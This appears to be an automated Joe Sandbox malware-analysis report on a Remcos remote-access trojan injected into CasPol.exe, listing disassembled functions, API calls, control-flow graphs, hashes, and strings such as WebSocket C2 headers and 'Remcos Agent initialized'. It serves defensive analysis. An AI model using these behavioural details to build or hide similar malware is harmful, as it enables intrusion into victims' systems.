                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                  • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                  • Opcode ID: dc5cd3b950707be250f4626283970aa53dc17a48cc22471f6a110bb8d9872840
                                                                                                                                                                                                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc5cd3b950707be250f4626283970aa53dc17a48cc22471f6a110bb8d9872840
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                                                                                                  Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3525466593-0
                                                                                                                                                                                                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                  • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                  Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                                                                                                                                  • Opcode ID: a4ae7698bbb6c3538385491ed6a526f7ae5f1a2b6b2491b670bdf3ee0830e6aa
                                                                                                                                                                                                                                  • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4ae7698bbb6c3538385491ed6a526f7ae5f1a2b6b2491b670bdf3ee0830e6aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                                                                                                                  Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                                                                                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1815803762-0
                                                                                                                                                                                                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                  • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                                                                                                                  Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4229901323-0
                                                                                                                                                                                                                                  • Opcode ID: cde94d6ab6d559736168707b99f603480b027a4e5b0d27f6afb59f5a93c8ae6f
                                                                                                                                                                                                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cde94d6ab6d559736168707b99f603480b027a4e5b0d27f6afb59f5a93c8ae6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                                  Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                                                                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                                                                  Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 103->108 109 40d9db call 40697b 103->109 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 189->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 197->203 198->203 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->258 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 258->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 399 40e022-40e025 395->399 400 40e033-40e038 395->400 396->395 401 40e073-40e08e call 401e8f call 41246e 399->401 402 40e027-40e031 399->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 400->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-EC111K$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                  • API String ID: 2830904901-2405482432
                                                                                                                                                                                                                                  • Opcode ID: 7ac484e1e60128ce9aa6a1ae0a508b75fc070fd572a4dba106659cdb8598b837
                                                                                                                                                                                                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac484e1e60128ce9aa6a1ae0a508b75fc070fd572a4dba106659cdb8598b837
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                                                                                                                                  Function 10009293 Relevance: 56.4, APIs: 13, Strings: 19, Instructions: 403COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 494 10009293-100092bc call 10008550 498 100092c2-100092c6 494->498 499 10009356-10009373 494->499 501 100092c8-100092ca 498->501 502 100092cc 498->502 503 1000939a-100093c2 call 10003dc0 call 100085a0 call 100036c0 499->503 504 100092ce-100092ed call 10008550 501->504 502->504 520 100093c4-100093d3 503->520 521 100093d8-100093fe call 10009f90 503->521 509 100092f8-100092fc 504->509 510 100092ef-100092f6 504->510 512 10009302 509->512 513 100092fe-10009300 509->513 510->499 515 10009304-10009320 call 10008550 512->515 513->515 522 10009322-10009326 515->522 523 1000934f 515->523 524 100097b1-100097c1 call 1000dd3f call 100084c0 520->524 530 10009401-10009406 521->530 527 10009328-1000932a 522->527 528 1000932c 522->528 523->499 544 100097c4-100097cc 524->544 531 1000932e-10009346 call 10008550 527->531 528->531 530->530 533 10009408-10009421 send 530->533 542 10009375-10009379 531->542 543 10009348 531->543 536 10009423-1000944c call 10009f90 533->536 537 10009459-10009480 call 10009f90 533->537 549 10009450-10009455 536->549 550 10009483-10009488 537->550 545 1000937b 542->545 546 1000937d-1000937e 542->546 543->523 545->546 546->503 549->549 551 10009457 549->551 550->550 552 1000948a-100094bd send call 10009f90 550->552 551->552 555 100094c0-100094c5 552->555 555->555 556 100094c7-100094fc send call 10009f90 555->556 559 10009500-10009505 556->559 559->559 560 10009507-1000951e send 559->560 561 10009520-10009524 560->561 562 1000956e 560->562 563 10009526 561->563 564 10009528-1000954b call 10009f90 561->564 565 10009574-10009593 call 10009f90 562->565 563->564 571 10009550-10009555 564->571 570 10009596-1000959b 565->570 570->570 572 1000959d-100095ce send call 10009f90 570->572 571->571 573 10009557-1000956c send 571->573 576 100095d0-100095d5 572->576 573->565 576->576 577 100095d7-10009605 send call 10009f90 576->577 580 10009608-1000960d 577->580 580->580 581 1000960f-1000961e send 580->581 582 10009620-10009623 581->582 583 10009641-10009657 recv 582->583 584 10009625-1000962b 582->584 583->544 587 1000965d-1000965e 583->587 585 10009660-1000966e 584->585 586 1000962d-10009635 584->586 588 10009670-10009674 585->588 589 10009683-1000969e call 10008550 585->589 586->585 590 10009637-1000963f 586->590 587->582 591 10009676 588->591 592 10009678-10009679 588->592 595 100096a4-100096a8 589->595 596 1000979c-100097a0 589->596 590->583 590->585 591->592 592->589 595->596 599 100096ae 595->599 597 100097a2 596->597 598 100097a4-100097ac 596->598 597->598 598->524 600 100096b4 599->600 601 100096b6-100096b9 600->601 602 100096d7-100096e9 recv 601->602 603 100096bb-100096c1 601->603 602->544 604 100096ef-100096f0 602->604 605 100096f2-100096f9 603->605 606 100096c3-100096cb 603->606 604->601 605->600 607 100096fb-10009702 605->607 606->605 608 100096cd-100096d5 606->608 607->600 609 10009704-10009735 setsockopt ioctlsocket call 1000a5f3 607->609 608->602 608->605 611 1000973a-1000979b 609->611
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
                                                                                                                                                                                                                                  • API String ID: 0-1585909395
                                                                                                                                                                                                                                  • Opcode ID: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                  • Instruction ID: 8c5c428c0198e8a7c9dce20c2a40cf958e763ea39fc21358b4929ecef954cfc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
